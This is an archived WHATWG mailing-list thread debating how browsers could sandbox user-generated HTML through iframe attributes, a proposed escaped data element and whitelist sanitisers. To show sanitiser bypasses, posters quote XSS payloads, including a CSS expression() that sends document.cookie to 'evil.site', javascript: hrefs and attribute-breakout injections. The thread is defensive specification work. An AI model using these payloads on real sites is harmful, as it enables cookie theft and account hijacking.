Re: [whatwg] Sandboxing to accommodate user generated content.

2009-02-17 Thread Ian Hickson
On Tue, 17 Jun 2008, Frode Børli wrote:
 
 A major challenge for many web developers is validating untrusted content
 such as the message body of a blog comment. Unless the developer has a
 flawless and future proof algorithm for ensuring that the message body does
 not contain any script, web developers have to resort to text only - or
 bbCode-style markup languages to allow users to post text content with
 richer formatting. [...]
 
 Another problem which makes future proofing this type of security is that
 standards evolve. A few years ago you could safely allow users to apply
 css-styles to tags. [...]

In general using whitelisting and a real parser and serialiser 
combination, e.g. what html5lib does now, allows one to have pretty secure 
and future-proof sanitiser.


 One solution:
 
 htmlareaUser generated content/htmlarea
 
 No scripts would ever be allowed to be executed inside this tag. 
 Malicious users could potentially submit /htmlarea unsafe content 
 htmlarea and get around this. There are as I can see it two solutions 
 to this:
 
 User generated content inside the tag must be escaped using html 
 entities (but still rendered as html by the user agent), or the author 
 must prevent users from submitting the string /htmlarea and all 
 possible variations of the tag.
 
 If the first solution is used, then browsers should display a strong 
 security warning if unescaped content is seen between htmlarea-tags on a 
 website (to educated web developers).

HTML5 now has something similar to this:

   iframe sandbox src=data:text/html;base64,.../iframe

...where ... is the sanitised user-provided content, base64-encoded.


On Tue, 17 Jun 2008, Frode Børli wrote:
 
 In the discussions I find that backward compatability is absolutely the 
 most important issue. Second is that it must be easy for web developers 
 to use the features.
 
 The suggested solution of using an attribute on an iframe element for 
 storing the user generated content has several problems;
 
 1: The use of src= as a fallback means that style information will be 
 lost and stylesheets must be loaded again.

The CSS can be embedded in the iframed snippets in the transition period; 
on the long term, the seamless attribute side-steps this issue.


 2: The use of src= yields problems with iframe heights (since the 
 src-url must be hosted on another server javascript cannot fix this) and 
 HTML 4 browsers have no other method of adjusting the iframe height 
 according to the content.

The seamless attribute addresses this also, though admittedly there is 
no good short-term fix for this.


 3: If you have a page that lists 60 comments on a blog, then the user 
 agent would have to contact the server 60 times to fetch each comment.

With data: URLs, all the comments can be included in the original request.


 4: For the fallback method of using src= for HTML 4 browsers to actually 
 work, the fallback documents must be hosted on a separate domain name. 
 This again means that a website using HTTPS must purchase and maintain 
 two certificates.

This is a problem with any solution that is intended to work with today's 
browsers without server-side sanitation, indeed.


 If we add a new element htmlarea/htmlarea, old browsers will run 
 scripts, while new browsers will stop scripts and this is a major 
 problem.

Indeed.


 If HTML 5 browsers require everything between htmlarea/htmlarea to 
 be html entity escaped, that is  and  must be replaced with lt; and 
 gt; respectively. If this is not done, HTML 5 browsers will issue a 
 severe warning and refuse to display the page. Developers will quickly 
 learn.

How would the browser know when the /htmlarea tag is the actual end tag 
or just something that the author forgot to escape?


 HTML 4 browsers will never run scripts (since it will only see plain 
 text). HTML 5 browsers will display rich text. It would be completely 
 secure for both HTML 4 and HTML 5 browsers.

 A simple Javascript could clean up the HTML markup for HTML 4 browsers..

Wouldn't that reintroduce the security bugs?


On Wed, 18 Jun 2008, Frode Børli wrote:
 
 I have written a sanitizer for html and it is very difficult - 
 especially since browsers have undocumented bugs in their parsing.
 
 Example: div colspan=amp;
 style=font-family#61;expression#40;alert#40quot;hackedquot#41#41
 colspan=amp;Red/div

A sanitiser that did what I describe above would not be affected by this 
(or any other similar problem). Basically, you would have to parse the 
content using the HTML5 parser rules, and then reserialise the content, 
dropping any element or attribute or attribute value that is not 
explicitly whitelisted. It is critical that for every allowed attribute, 
the value be parsed using the relevant rules (e.g. CSS for style=, as a 
URL for href=, etc), and then the values therein reserialised in the 
same manner for that language (e.g. only serialising CSS properties that 
have whitelisted property values).

Yes, 

Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-18 Thread Mikko Rantalainen
Frode Børli wrote:
 I have been reading up on past discussions on sandboxing content, and

 My main arguments for having this feature (in one form or another) in
 the browser is:

 - It is future proof. Changes to browsers (for example adding
 expression support to css) will never again require old sanitizers to
 be updated.

Unless some braindead vendor is going to add scripting-in-sandboxing
feature which would be equally braindead to unlimited expression support
in css. You cannot be future proof unless you trust all the players
including ALL possible browser vendors.

 If the sanitiser uses a whitelist based approach that forbids everything by
 default, and then only allows known elements and attributes; and in the case
 of the style attribute, known properties and values that are safe, then that
 would also be the case.
 
 I have written a sanitizer for html and it is very difficult -
 especially since browsers have undocumented bugs in their parsing.
 
 Example: div colspan=amp;
 style=font-family#61;expression#40;alert#40quot;hackedquot#41#41
 colspan=amp;Red/div

Every real sanitizer MUST parse the input and generate its internal DOM.
If you then generate known good serialization of that DOM there's no way
your sanitizer would ever output such code. I, too, have written my own
simplified HTML parser that converts all unknown parts to data (that is,
escape all the following characters: '). Just parse the input into
DOM and only after that check if for safe content.

You cannot sanitize HTML using only string replacements without
generating a DOM (all of DOM is not needed in the memory at once, it's
possible to process the input as a stream and handle one tag at a time
and only keep a stack of open tag names in addition).

 The proof that sanitazing HTML is difficult is the fact that no major
 site even attempts it. Even wikipedia use some obscure wiki-language,
 instead of implementing a wysiwyg editor.

Wikipedia does sanitize HTML in the content. It does support its own
wiki-language in addition to HTML. For example, Try to input the
following text as is in the wikipedia sandbox page and press Show preview:

***

 Example: div colspan=amp;
 style=font-family#61;expression#40;alert#40quot;hackedquot#41#41
 colspan=amp;Red/div

Some bmore/b content ihere/i.
***

Works just fine. The content is sanitized and unregognized parts are
converted to data. Correctly written parts are used as HTML tags.

Trust me, it's really not that hard. The hard part is to decide which
tags and which attributes and which attribute values do you want to
allow. And you have to decide that by yourself - there's no magic silver
bullet safe feature set that is suitable for every usage and for every site.

If you don't want to go through all this trouble, do not try to allow
HTML or any other markup in user generated content unless you *really*
trust your users.

 Note that sandboxing doesn't entirely remove the need for sanitising user
 generated content on the server, it's just an extra line of defence in case
 something slips through.
 
 Ofcourse. However, the sandbox feature in browser will be fail safe if
 user generated content is escaped with lt; and gt; before being sent
 to the browser - as long as the browser does not have bugs of course.

That's a pretty big if. If the page author / server application
programmer is always able to escape content correctly, how much harder
is it to correctly escape and sanitize the content in anyway?

All this sounds too much like magic_quotes in PHP...

 A problem with this approach is that developers might forget to escape
 tags, therefore I think browsers should display a security warning
 message if the character  or  is encountered inside a data tag.
 If a developer forgot to escape the markup at all, then a user could enter
 /datascript.../script and do anything they wanted.
 
 Yes, that is my point. That is why I want the sandbox to display a
 severe security warning if the developer has forgotten to escape it.

Isn't that a bit too late? If the developer is not testing his
application before the release what's the point of breaking the whole
site in the user's browser as a result? It will not guard against XSS
because the user generated content can be *first* used to end the
sandbox and *then* user to insert XSS attack. Browser sees only valid
content in the sandbox and site is still under XSS attack.

 This method will be safe for all browsers that has ever existed and
 that will ever exist in the future. If new features are introduced in
 some future version of CSS or HTML - the sandbox is still there and
 the applications created today does not need to have their sanitizers
 updated, ever.

That's a pretty bold claim! I guess that a similar claim could have been
said about CSS support before Microsoft added the expression() value
syntax.

Can *you* guarantee that a random browser vendor does not implement
anything stupid for the sandbox content in the future?

-- 
Mikko




Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-18 Thread Kristof Zelechovski
Let’s sort things out, folks.  There is nothing in the spec to prevent a
browser vendor to format the user’s hard drive and to drain her bank account
as a bonus when the page displayed contains the string D357R0Y!N0\V!.  The
spec does not tell the vendors what not to do, therefore it cannot guarantee
anything in this respect.  The spec provides a reference implementation and
it is our job not to let harmful extensions in here; what happens in the
wild is beyond our control.
IMHO,
Chris

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Mikko Rantalainen
Sent: Wednesday, June 18, 2008 9:20 AM
To: whatwg@lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

Frode Børli wrote:
 I have been reading up on past discussions on sandboxing content, and

 My main arguments for having this feature (in one form or another) in
 the browser is:

 - It is future proof. Changes to browsers (for example adding
 expression support to css) will never again require old sanitizers to
 be updated.

Unless some braindead vendor is going to add scripting-in-sandboxing
feature which would be equally braindead to unlimited expression support
in css. You cannot be future proof unless you trust all the players
including ALL possible browser vendors.

[snip]

 This method will be safe for all browsers that has ever existed and
 that will ever exist in the future. If new features are introduced in
 some future version of CSS or HTML - the sandbox is still there and
 the applications created today does not need to have their sanitizers
 updated, ever.

That's a pretty bold claim! I guess that a similar claim could have been
said about CSS support before Microsoft added the expression() value
syntax.

Can *you* guarantee that a random browser vendor does not implement
anything stupid for the sandbox content in the future?

-- 
Mikko




Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Anne van Kesteren

On Tue, 17 Jun 2008 06:09:55 +0200, Frode Børli [EMAIL PROTECTED] wrote:
Hi! I am a new member of this mailing list, and I wish to contribute  
with a couple of specific requirements that I believe should be  
discussed and
perhaps implemented in the final specification. I am unsure if this is  
the correct place to post my ideas (or if my ideas are even new), but if  
it is not, then I am sure somebody will instruct me. :) One person told  
me that
the specification was finished and no new features would be added from  
now on - but hopefully that is not true.


That is actually true. However, sandboxing has been proposed in the past  
and is therefore still considered in scope. (Unless of course we decide  
it's out of scope, but given the sandboxing features already in the  
specification, I expect that to be not the case.)




One solution:

htmlareaUser generated content/htmlarea


As you note this solution has significant issues. Besides inserting  
/htmlarea it would also allow execution of scripts in legacy user agents  
and is therefore not really backwards compatible.


I believe the idea to deal with this is to add another attribute to  
iframe, besides sandbox= and seamless= we already have for  
sandboxing. This attribute, doc=, would take a string of markup where  
you would only need to escape the quotation character used (so either ' or  
). The fallback for legacy user agents would be the src= attribute.



--
Anne van Kesteren
http://annevankesteren.nl/
http://www.opera.com/


Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Frode Børli
I have been reading up on past discussions on sandboxing content, and
I feel that it is generally agreed on that there should be some
mechanism for marking content as user generated. The discussion
mainly appears to be focused on implementation. Please read my
implementation notes at the end of this message on how we can include
this function safely for both HTML 4 and HTML 5 browsers, and still
allow HTML 4 browsers to function properly.


My main arguments for having this feature (in one form or another) in
the browser is:

- It is future proof. Changes to browsers (for example adding
expression support to css) will never again require old sanitizers to
be updated.
- It does not require much skill and effort from the web developer to
safely sanitize user content.
- Security bugs are fixed by browser vendors, and not by each web developer.


In the discussions I find that backward compatability is absolutely
the most important issue. Second is that it must be easy for web
developers to use the features.

The suggested solution of using an attribute on an iframe element
for storing the user generated content has several problems;

1: The use of src= as a fallback means that style information will be
lost and stylesheets must be loaded again.

2: The use of src= yields problems with iframe heights (since the
src-url must be hosted on another server javascript cannot fix this)
and HTML 4 browsers have no other method of adjusting the iframe
height according to the content.

3: If you have a page that lists 60 comments on a blog, then the user
agent would have to contact the server 60 times to fetch each comment.
This again means that perl/php scripts have to be invoked 60 times for
one page view - that is 61 separate database connections and session
initializations.

4: For the fallback method of using src= for HTML 4 browsers to
actually work, the fallback documents must be hosted on a separate
domain name. This again means that a website using HTTPS must purchase
and maintain two certificates.

I do not believe this solution will ever be used.


My solution:

If we add a new element htmlarea/htmlarea, old browsers will run
scripts, while new browsers will stop scripts and this is a major
problem.

If HTML 5 browsers require everything between htmlarea/htmlarea to
be html entity escaped, that is  and  must be replaced with lt; and
gt; respectively. If this is not done, HTML 5 browsers will issue a
severe warning and refuse to display the page. Developers will quickly
learn.

HTML 4 browsers will never run scripts (since it will only see plain
text). HTML 5 browsers will display rich text. It would be completely
secure for both HTML 4 and HTML 5 browsers.

A simple Javascript could clean up the HTML markup for HTML 4 browsers..


  I believe the idea to deal with this is to add another attribute to 
 iframe, besides sandbox= and seamless= we already have for sandboxing. 
 This attribute, doc=, would take a string of markup where you would only 
 need to escape the quotation character used (so either ' or ). The fallback 
 for legacy user agents would be the src= attribute.

-- 
Best regards / Med vennlig hilsen
Frode Børli
Seria.no

Mobile:
+47 406 16 637
Company:
+47 216 90 000
Fax:
+47 216 91 000


Think about the environment. Do not print this e-mail unless you really need to.

Tenk miljø. Ikke skriv ut denne e-posten dersom det ikke er nødvendig.


Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Kristof Zelechovski
1.  Please elaborate how an extension of CSS would require a sanitizer
update.
2.  Please explain why using a dedicated tag with double parsing is easier
for a Web developer than putting the code in an attribute.
3.  Your quoting solution would not cause legacy browsers to show plain
text; they would show HTML code, which is probably much worse than showing
plain text.  If you mean JavaScript can be used to extract plain text, I
doubt it will be simple; there are probably lots of junctions where this
procedure can derail.
4.  Please explain why you consider network efficiency for legacy user
agents essential.  I believe that the correlation between efficiency and
compatibility is negative in general.  If that causes server overload, the
server can discriminate content depending on the user agent; this is a
temporary solution to an edge case and it should probably be acceptable.
Besides, a blog page with 60 comments on it is rather hard to render and
read so you should probably consider other display options in this case.
5.  I am not sure why IFRAME content must be HTTP-secured if the containing
page is.  The specification does not impose such a restriction AFAIK.  And,
if you need to go secure, do not allow scribbling in the first place, right?
Please take these points as a challenge, not as an attempt to let you down.
I personally think your idea is worth considering.
Chris

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Frode Borli
Sent: Tuesday, June 17, 2008 3:05 PM
To: whatwg@lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

I have been reading up on past discussions on sandboxing content, and
I feel that it is generally agreed on that there should be some
mechanism for marking content as user generated. The discussion
mainly appears to be focused on implementation. Please read my
implementation notes at the end of this message on how we can include
this function safely for both HTML 4 and HTML 5 browsers, and still
allow HTML 4 browsers to function properly.


My main arguments for having this feature (in one form or another) in
the browser is:

- It is future proof. Changes to browsers (for example adding
expression support to css) will never again require old sanitizers to
be updated.
- It does not require much skill and effort from the web developer to
safely sanitize user content.
- Security bugs are fixed by browser vendors, and not by each web developer.


In the discussions I find that backward compatability is absolutely
the most important issue. Second is that it must be easy for web
developers to use the features.

The suggested solution of using an attribute on an iframe element
for storing the user generated content has several problems;

1: The use of src= as a fallback means that style information will be
lost and stylesheets must be loaded again.

2: The use of src= yields problems with iframe heights (since the
src-url must be hosted on another server javascript cannot fix this)
and HTML 4 browsers have no other method of adjusting the iframe
height according to the content.

3: If you have a page that lists 60 comments on a blog, then the user
agent would have to contact the server 60 times to fetch each comment.
This again means that perl/php scripts have to be invoked 60 times for
one page view - that is 61 separate database connections and session
initializations.

4: For the fallback method of using src= for HTML 4 browsers to
actually work, the fallback documents must be hosted on a separate
domain name. This again means that a website using HTTPS must purchase
and maintain two certificates.

I do not believe this solution will ever be used.


My solution:

If we add a new element htmlarea/htmlarea, old browsers will run
scripts, while new browsers will stop scripts and this is a major
problem.

If HTML 5 browsers require everything between htmlarea/htmlarea to
be html entity escaped, that is  and  must be replaced with lt; and
gt; respectively. If this is not done, HTML 5 browsers will issue a
severe warning and refuse to display the page. Developers will quickly
learn.

HTML 4 browsers will never run scripts (since it will only see plain
text). HTML 5 browsers will display rich text. It would be completely
secure for both HTML 4 and HTML 5 browsers.

A simple Javascript could clean up the HTML markup for HTML 4 browsers..


  I believe the idea to deal with this is to add another attribute to
iframe, besides sandbox= and seamless= we already have for sandboxing.
This attribute, doc=, would take a string of markup where you would only
need to escape the quotation character used (so either ' or ). The fallback
for legacy user agents would be the src= attribute.

-- 
Best regards / Med vennlig hilsen
Frode Borli
Seria.no

Mobile:
+47 406 16 637
Company:
+47 216 90 000
Fax:
+47 216 91 000


Think about the environment. Do not print this e-mail unless you really need
to.

Tenk miljo. Ikke skriv ut

Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Bob Auger
Hello,

I'm new to the list and have joined in response to this discussion on
html security changes.

I have been reading up on past discussions on sandboxing content, and I feel 
that it is generally agreed on that there should be some mechanism for 
marking content as user
generated. The discussion mainly appears to be focused on implementation. 
Please read my implementation notes at the end of this message on how we can 
include this
function safely for both HTML 4 and HTML 5 browsers, and still allow HTML 4 
browsers to function properly.


 In the discussions I find that backward compatability is absolutely the most 
 important issue. Second is that it must be easy for web developers to use 
 the features.

 The suggested solution of using an attribute on an iframe element for 
 storing the user generated content has several problems;

 1: The use of src= as a fallback means that style information will be lost 
 and stylesheets must be loaded again.

 2: The use of src= yields problems with iframe heights (since the src-url 
 must be hosted on another server javascript cannot fix this) and HTML 4 
 browsers have no other method of
 adjusting the iframe height according to the content.

 My solution:

 If we add a new element htmlarea/htmlarea, old browsers will run 
 scripts, while new browsers will stop scripts and this is a major problem.

 If HTML 5 browsers require everything between htmlarea/htmlarea to be 
 html entity escaped, that is  and  must be replaced with lt; and gt; 
 respectively. If this is not
 done, HTML 5 browsers will issue a severe warning and refuse to display the 
 page. Developers will quickly learn.

 HTML 4 browsers will never run scripts (since it will only see plain text). 
 HTML 5 browsers will display rich text. It would be completely secure for 
 both HTML 4 and HTML 5
 browsers.

 A simple Javascript could clean up the HTML markup for HTML 4 browsers..

I've also been having side discussions with a few people regarding the
ability for a website owner to mark sections as data rather than code
(where everything lies now).
Your htmlarea tag idea is a good one (maybe change the tag to data
just a nitpick) however you don't address the use case of the
following

data

user supplied input

/data

If the user injects /data then game over.  A solution I discovered
for this problem (others I'm sure as well that aren't speaking)
borrows from the defenses of cross-site request forgery (CSRF) where a
non guessable token is used. Take the following example

data id=GUID
/data
/data id=GUID

GUID would be a temporary GUID value such as
'F9968C5E-CEB2-4faa-B6BF-329BF39FA1E4' that would be tied to the user
session. An attacker would be unable to break out of a data tag due
to the fact that they couldn't guess the closing ID value. This is
something that could be built into a web framework (JSP tag/PHP
function/asp.net component) that could handle the token generation
portion to assist with adoption.

A few notes on this approach

- data (or htmlarea whatever you call it) can not be nested.
- All content inside data tags would need to be treated as text or
handled as HTML entity encoded values before processing


  I believe the idea to deal with this is to add another attribute to 
 iframe, besides sandbox= and seamless= we already have for sandboxing. 
 This attribute, doc=, would take
 a string of markup where you would only need to escape the quotation 
 character used (so either ' or ). The fallback for legacy user agents would 
 be the src= attribute.


To take this a step further there may be situations where user content
is reflected inside of HTML tags in the following manner such as
'a href=user generated valuefoo/a'. For situations like this an
additional attribute (along the lines of what you propose) could be
added to this tag (or any tag for that matter)
to instruct the browser that no script/html can execute.

a sandbox=true  href=javascript:alert(document.cookie)asd/a
a sandbox=true href=injected valueasd/a  (injected value  
onload=javascript:alert('wooot') foo=bar)

In this example the developer would allow user content to be inserted
into the href value as desired, however disallow script injection as
well as breaking out of the html attribute by the specification of
this tag (i.e. everything inside each attribute is treated as HTML
entity data/text).

My 0.04.

Regards,
- Robert Auger
http://www.webappsec.org/


Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Frode Børli
 I've also been having side discussions with a few people regarding the
 ability for a website owner to mark sections as data rather than code
 (where everything lies now).
 Your htmlarea tag idea is a good one (maybe change the tag to data
 just a nitpick) however you don't address the use case of the
 following

 data

 user supplied input

 /data


I have considered your idea (below) but found that it would not allow
efficient server side caching, which often is needed. If instead all
html inside data/data must be escaped like this:

data

lt;user supplied inputgt;

/data

Then this will be secure both for HTML 4 and HTML 5 browsers. HTML 4
browsers will display html, while HTML 5 browsers will display
correctly formatted code. A simple javascript like this (untested)
would make the data tags readable for HTML 4 browsers:

var els = document.getElementsByTagName(DATA);
for(e in els) els[e].innerHTML =
els[e].innerHTML.replace(/#91;^#93;*/g, ).replace(/\n/g,
br);


A problem with this approach is that developers might forget to escape
tags, therefore I think browsers should display a security warning
message if the character  or  is encountered inside a data tag.


 If the user injects /data then game over.  A solution I discovered
 for this problem (others I'm sure as well that aren't speaking)
 borrows from the defenses of cross-site request forgery (CSRF) where a
 non guessable token is used. Take the following example

 data id=GUID
 /data
 /data id=GUID

 GUID would be a temporary GUID value such as
 'F9968C5E-CEB2-4faa-B6BF-329BF39FA1E4' that would be tied to the user
 session. An attacker would be unable to break out of a data tag due
 to the fact that they couldn't guess the closing ID value. This is

*snip*


  I believe the idea to deal with this is to add another attribute to 
 iframe, besides sandbox= and seamless= we already have for 
 sandboxing. This attribute, doc=, would take
 a string of markup where you would only need to escape the quotation 
 character used (so either ' or ). The fallback for legacy user agents 
 would be the src= attribute.

 To take this a step further there may be situations where user content
 is reflected inside of HTML tags in the following manner such as
 'a href=user generated valuefoo/a'. For situations like this an
 additional attribute (along the lines of what you propose) could be
 added to this tag (or any tag for that matter)
 to instruct the browser that no script/html can execute.

 a sandbox=true  href=javascript:alert(document.cookie)asd/a
 a sandbox=true href=injected valueasd/a  (injected value  
 onload=javascript:alert('wooot') foo=bar)


I like this better than a separate tag yes. div sandbox=1/div or
div content=untrusted/div


Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Frode Børli
 1.  Please elaborate how an extension of CSS would require a sanitizer
 update.

In the year 1998: A sanitizer algorithm works perfectly for all
existing methods of adding scripts. It uses a white list, which allows
only certain tags and attributes. Among the allowed attributes is
colspan, rowspan and style - since the web developer wants users to be
able to build tables and style them properly.

In the year 1999 Internet Explorer 5.0 is introduced, and it
introduces a new invention; CSS-expressions. Suddenly the formerly
secure webapplication is no longer secure. A user adds the following
code, and it passes the sanitizer easily:

span style='color: blue; width: expression(document.write(img
src=http://evil.site/+document.cookie));'/span

I am absolutely certain that there will be other, brilliant inventions
in the future which will break sanitizers - ofcourse we can't know
which inventions today - but the sandboxing means that browser vendors
in the future can prevent the above scenario.

 2.  Please explain why using a dedicated tag with double parsing is easier
 for a Web developer than putting the code in an attribute.

1. The code will still work in Dreamwaver and similar tools.
2. It is not a totally new way of doing things (we already escape
content that are put into textarea in the exact same way as I
suggest we put content into the sandbox). Putting a 100 KB piece of
user submitted content into an attribute will feel weird - and perhaps
even break current parsers.
3. Web developers do not have to create seperate scripts to cater for
HTML 4 browser (so that the iframe src= fallback will work).
4. Web developers do not have to create two separate websites (on
different domains) that use the same database to make sure that cross
site scripting can't happen from the iframe to the parent document. If
the web developer simply place a separate script on the same host -
then the fallback will have no security at all.
5. The fallback requires the web developer to know the visible size of
the content in advance. HTML 4 browsers do not support any methods of
resizing the iframe according to the content, when the content of
the iframe is from a different domain.


 3.  Your quoting solution would not cause legacy browsers to show plain
 text; they would show HTML code, which is probably much worse than showing
 plain text.  If you mean JavaScript can be used to extract plain text, I
 doubt it will be simple; there are probably lots of junctions where this
 procedure can derail.

I am pretty sure that including a small script similar to this into
the main document will make the content very readable, although plain
text:

script
var els = document.getElementsByTagName(DATA);
for(e in els) els[e].innerHTML =
els[e].innerHTML.replace(/#91;^#93;*/g,
).replace(/\n/g,br);
/script

I can guarantee you that a few hours work I have a very good script
that does this very well.

 4.  Please explain why you consider network efficiency for legacy user
 agents essential.  I believe that the correlation between efficiency and
 compatibility is negative in general.

It is not the network efficiency for the user agens I am worried about
- it is the server side of things that will be the problem. If  the
server has to do handle 20 separate dynamic requests just to display a
single page view then that is unacceptable - and the method will never
be used by bigger websites simply because it is not scalable. In fact,
it would have already been done if it was a viable option. Please
consider my answer to your question number two as well.

 If that causes server overload, the
 server can discriminate content depending on the user agent; this is a
 temporary solution to an edge case and it should probably be acceptable.

That is unacceptable. Major websites must accommodate at least 98 % of
its user base at any time, and to promote user agent checking on the
server side is a major issue for me, and most likely for most other
web developers that work on a per project basis. It would require me
to review already launched sites regularly and is hardly efficient use
of my labour.

 Besides, a blog page with 60 comments on it is rather hard to render and
 read so you should probably consider other display options in this case.

I am extremely against making assumptions such as a blog page with 60
comments on is rather hard to read so it will never be a problem. I
prefer scrolling before clicking next page any time. If there is a
choice to display 100 comments instead of 10 then I select 100
comments. Also user generated content might be single line comments,
or even just a list of single words.

 5.  I am not sure why IFRAME content must be HTTP-secured if the containing
 page is.  The specification does not impose such a restriction AFAIK.  And,
 if you need to go secure, do not allow scribbling in the first place, right?

1. An insecure iframe in a secure document will give you security
warnings from the browser (There are insecure 

Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Lachlan Hunt

Frode Børli wrote:

I have been reading up on past discussions on sandboxing content, and
I feel that it is generally agreed on that there should be some
mechanism for marking content as user generated. The discussion
mainly appears to be focused on implementation. Please read my
implementation notes at the end of this message on how we can include
this function safely for both HTML 4 and HTML 5 browsers, and still
allow HTML 4 browsers to function properly.

My main arguments for having this feature (in one form or another) in
the browser is:

- It is future proof. Changes to browsers (for example adding
expression support to css) will never again require old sanitizers to
be updated.


If the sanitiser uses a whitelist based approach that forbids everything 
by default, and then only allows known elements and attributes; and in 
the case of the style attribute, known properties and values that are 
safe, then that would also be the case.



- It does not require much skill and effort from the web developer to
safely sanitize user content.
- Security bugs are fixed by browser vendors, and not by each web developer.


Note that sandboxing doesn't entirely remove the need for sanitising 
user generated content on the server, it's just an extra line of defence 
in case something slips through.



The suggested solution of using an attribute on an iframe element
for storing the user generated content has several problems;

1: The use of src= as a fallback means that style information will be
lost and stylesheets must be loaded again.


This is not a major problem.  If it uses the same stylesheet, which can 
be cached by the browser, then at worst it results in a 304 Not Modified 
response.



2: The use of src= yields problems with iframe heights (since the
src-url must be hosted on another server javascript cannot fix this)
and HTML 4 browsers have no other method of adjusting the iframe
height according to the content.


In recent browsers that support cross-document messaging (Opera 9, 
Safari 3, Firefox 3 and IE 8), you could include a script within the 
comment page that calculates its own height and sends a message to the 
parent page with the info.  In older browsers, just set the height to a 
reasonable minimum and let the user scroll.  Sure, it's not perfect, but 
it's called graceul degradation.



3: If you have a page that lists 60 comments on a blog, then the user
agent would have to contact the server 60 times to fetch each comment.
This again means that perl/php scripts have to be invoked 60 times for
one page view - that is 61 separate database connections and session
initializations.


You could always concatenate all of the comments into a single file, 
reducing it down to 1 request.



4: For the fallback method of using src= for HTML 4 browsers to
actually work, the fallback documents must be hosted on a separate
domain name. This again means that a website using HTTPS must purchase
and maintain two certificates.


I don't see that as a show stopper.


My solution:

If we add a new element htmlarea/htmlarea, old browsers will run
scripts, while new browsers will stop scripts and this is a major
problem.

If HTML 5 browsers require everything between htmlarea/htmlarea to
be html entity escaped, that is  and  must be replaced with lt; and
gt; respectively. If this is not done, HTML 5 browsers will issue a
severe warning and refuse to display the page. Developers will quickly
learn.


Draconian error handling is something we really want to avoid, 
particularly when the such an error can be triggered by failing to 
handle user generated content properly.



HTML 4 browsers will never run scripts (since it will only see plain
text). HTML 5 browsers will display rich text. It would be completely
secure for both HTML 4 and HTML 5 browsers.

A simple Javascript could clean up the HTML markup for HTML 4 browsers..


In a separate mail, you wrote:

data

lt;user supplied inputgt;

/data

Then this will be secure both for HTML 4 and HTML 5 browsers. HTML 4
browsers will display html, while HTML 5 browsers will display
correctly formatted code. A simple javascript like this (untested)
would make the data tags readable for HTML 4 browsers:

var els = document.getElementsByTagName(DATA);
for(e in els) els[e].innerHTML =
els[e].innerHTML.replace(/#91;^#93;*/g, ).replace(/\n/g,
br);


At first, I had no idea what that script was trying to do.  But AFAICT, 
you were trying to use this regex: /[^]*/g, which would theoretically 
match foo.  But, in this context, even with the corrected regex, the 
script is entirely useless.


It wouldn't work, for example, with foo bar= baz=xxx.  But also 
because the inner HTML that you're running the regex on is supposed to 
have all  and  escaped, and so nothing would be matched anyway.



A problem with this approach is that developers might forget to escape
tags, therefore I think browsers should display a security warning
message if the character  or  is encountered 

Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Kristof Zelechovski
This particular explanation is irrelevant to the topic because sandboxed
fragments can contain scripts, whether within CSS or not.  The idea of
sandboxing is to disable scripts, not to purge them.
Chris

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Frode Borli
Sent: Tuesday, June 17, 2008 8:34 PM
To: Kristof Zelechovski
Cc: whatwg@lists.whatwg.org
Subject: Re: [whatwg] Sandboxing to accommodate user generated content.

 1.  Please elaborate how an extension of CSS would require a sanitizer
 update.

In the year 1998: A sanitizer algorithm works perfectly for all
existing methods of adding scripts. It uses a white list, which allows
only certain tags and attributes. Among the allowed attributes is
colspan, rowspan and style - since the web developer wants users to be
able to build tables and style them properly.

In the year 1999 Internet Explorer 5.0 is introduced, and it
introduces a new invention; CSS-expressions. Suddenly the formerly
secure webapplication is no longer secure. A user adds the following
code, and it passes the sanitizer easily:

span style='color: blue; width: expression(document.write(img
src=http://evil.site/+document.cookie));'/span

I am absolutely certain that there will be other, brilliant inventions
in the future which will break sanitizers - ofcourse we can't know
which inventions today - but the sandboxing means that browser vendors
in the future can prevent the above scenario.





Re: [whatwg] Sandboxing to accommodate user generated content.

2008-06-17 Thread Frode Børli
 I have been reading up on past discussions on sandboxing content, and
 I feel that it is generally agreed on that there should be some
 mechanism for marking content as user generated. The discussion
 mainly appears to be focused on implementation. Please read my
 implementation notes at the end of this message on how we can include
 this function safely for both HTML 4 and HTML 5 browsers, and still
 allow HTML 4 browsers to function properly.

 My main arguments for having this feature (in one form or another) in
 the browser is:

 - It is future proof. Changes to browsers (for example adding
 expression support to css) will never again require old sanitizers to
 be updated.

 If the sanitiser uses a whitelist based approach that forbids everything by
 default, and then only allows known elements and attributes; and in the case
 of the style attribute, known properties and values that are safe, then that
 would also be the case.

I have written a sanitizer for html and it is very difficult -
especially since browsers have undocumented bugs in their parsing.

Example: div colspan=amp;
style=font-family#61;expression#40;alert#40quot;hackedquot#41#41
colspan=amp;Red/div

The proof that sanitazing HTML is difficult is the fact that no major
site even attempts it. Even wikipedia use some obscure wiki-language,
instead of implementing a wysiwyg editor.

 Note that sandboxing doesn't entirely remove the need for sanitising user
 generated content on the server, it's just an extra line of defence in case
 something slips through.

Ofcourse. However, the sandbox feature in browser will be fail safe if
user generated content is escaped with lt; and gt; before being sent
to the browser - as long as the browser does not have bugs of course.

 The suggested solution of using an attribute on an iframe element
 for storing the user generated content has several problems;
 1: The use of src= as a fallback means that style information will be
 lost and stylesheets must be loaded again.
 This is not a major problem.  If it uses the same stylesheet, which can be
 cached by the browser, then at worst it results in a 304 Not Modified
 response.

Many small rivers...

 2: The use of src= yields problems with iframe heights (since the
 src-url must be hosted on another server javascript cannot fix this)
 and HTML 4 browsers have no other method of adjusting the iframe
 height according to the content.
 In recent browsers that support cross-document messaging (Opera 9, Safari 3,
 Firefox 3 and IE 8), you could include a script within the comment page that
